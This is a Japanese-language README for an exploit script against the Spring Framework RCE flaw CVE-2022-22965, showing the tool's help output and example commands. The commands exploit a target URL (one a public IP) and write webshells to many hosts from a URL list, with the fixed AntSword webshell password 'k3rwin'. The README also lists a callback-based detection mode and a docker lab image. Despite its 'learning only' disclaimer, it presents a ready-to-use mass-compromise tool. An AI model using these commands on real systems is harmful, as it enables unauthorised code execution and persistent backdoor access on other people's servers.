
springフレームワークのRCE脆弱性 CVE-2022-22965
影響範囲:JDK>=9 のSpringフレームワークおよび派生フレームワーク
スクリプトは学習目的のみで使用し、他の目的で使用した場合の法的責任は一切著者にはありません
pip3 install -r requirements.txt
$ python3 spring-core-rce.py -h
.----..-.-. .---. .-..-. .-..----. .----. .---. .---. .----. .---. .----..----.
{ {__-`| } }}} }}_}{ || \{ || |--' ___ | }`-'/ {-. \} }}_}} |__} ___ } }}_}| }`-'} |__}
.-._} } | |-' | } \ | }| }\ {| }-`}{___}| },-.\ '-} /| } \ } '__}{___}| } \ | },-.} '__}
`----' `-' `-'-' `-'`-' `-'`----' `----' `---' `-'-' `----' `-'-' `----'`----'
Spring framework Core RCE
By:K3rwin
usage: spring-core-rce.py [-h] [-u URL] [-s SYSTEM] [-r FILE]
Spring framework Core 0day RCE ヘルプガイド
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL ターゲットURLを指定
-s SYSTEM, --system SYSTEM
ターゲットホストのOSを指定(デフォルトはlinux)引数: win/linux
-r FILE, --file FILE URLファイルを指定、複数ターゲットに一括でシェルを書き込む
無害な検出
-u,--url または -f,--file で複数URLを一括検出
-c,--check 引数は自身で立てたHTTPサービス。
python3 -m http.server 80で手軽にWebサーバを起動可能主に内部ネットワークで、脆弱性を無害に検出したい場合に使用
python3 spring-core-rce.py -u "http://172.26.155.18:8080/" --check "http://172.26.155.18"

-u でURLを指定、-s でOSを指定。引数: linux または win、デフォルトは linux
python3 spring-core-rce.py -u "http://1.117.155.217:8080/" -s "linux"


-r で一括シェル書き込み、AntSwordで接続、パスワードは k3rwin
python3 spring-core-rce.py -r "urls.txt"


docker pull vulfocus/spring-core-rce-2022-03-29:latest
docker run -d -p 8080:8080 --name spring-core-rce -it vulfocus/spring-core-rce-2022-03-29